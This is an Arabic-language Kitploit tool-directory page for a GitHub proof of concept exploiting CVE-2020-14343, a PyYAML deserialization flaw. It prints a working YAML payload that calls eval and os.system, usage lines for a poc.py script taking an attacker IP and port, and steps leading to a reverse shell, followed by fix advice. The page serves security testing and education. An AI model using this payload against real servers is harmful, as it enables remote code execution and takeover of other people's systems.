Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-14343-PyYAML — حمولة CVE-2020-14343 | Kitploit
أدوات/GitHubGitHub/kairo-one/cve-2020-14343-pyyaml
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubkairo-one/cve-2020-14343-pyyaml

CVE-2020-14343-PyYAML

حمولة CVE-2020-14343

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-14343 PyYAML ثغرة إلغاء التسلسل (POC)

نظرة عامة على الثغرة

العنصرالمعلومات
رقم CVECVE-2020-14343
المكون المتأثرPyYAML < 5.4
نوع الثغرةإلغاء التسلسل لتنفيذ كود عن بعد (RCE)
مستوى الخطورةعالي

مبدأ الثغرة

عند استخدام PyYAML لدالة yaml.load() لتحليل بيانات غير موثوقة، فإنه لا يقيد علامات YAML الخطيرة (مثل !!python/object)، مما يسمح للمهاجم بإنشاء محتوى YAML ضار لتنفيذ كود Python تعسفي.

جوهر الحمولة (Payload):

root@kitploit:~
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]

طريقة الاستخدام

root@kitploit:~
python poc.py <الهدف URL> <عنوان IP المهاجم> <منفذ الاستماع>

مثال:

root@kitploit:~
python poc.py http://vulnerable-site.com 192.168.1.100 4444

خطوات الهجوم

  1. يقوم النص البرمجي بتشغيل مستمع TCP محلي
  2. رفع ملف YAML ضار إلى نقطة النهاية /upload على الهدف
  3. تفعيل نقطة النهاية /login لتحميل وتحليل ملف YAML
  4. يقوم الخادم الهدف بتنفيذ الحمولة، ثم يعيد قذيفة (reverse shell) إلى المهاجم

تثبيت التبعيات

root@kitploit:~
pip install requests

إخلاء مسؤولية

⚠️ هذه الأداة مخصصة فقط للبحث الأمني والاختبار المصرح به!

  • لا تستخدمها لأغراض غير قانونية
  • تأكد من الحصول على إذن من النظام المستهدف قبل الاستخدام
  • المؤلف غير مسؤول عن أي إساءة استخدام

توصيات الإصلاح

  1. استخدم yaml.safe_load() بدلاً من yaml.load()
  2. قم بترقية PyYAML إلى الإصدار 5.4 أو أحدث
  3. قم بالتحقق الصارم من إدخال المستخدم

روابط مرجعية

  • CVE-2020-14343 - NVD
  • الوثائق الرسمية لـ PyYAML
تنزيل الأداة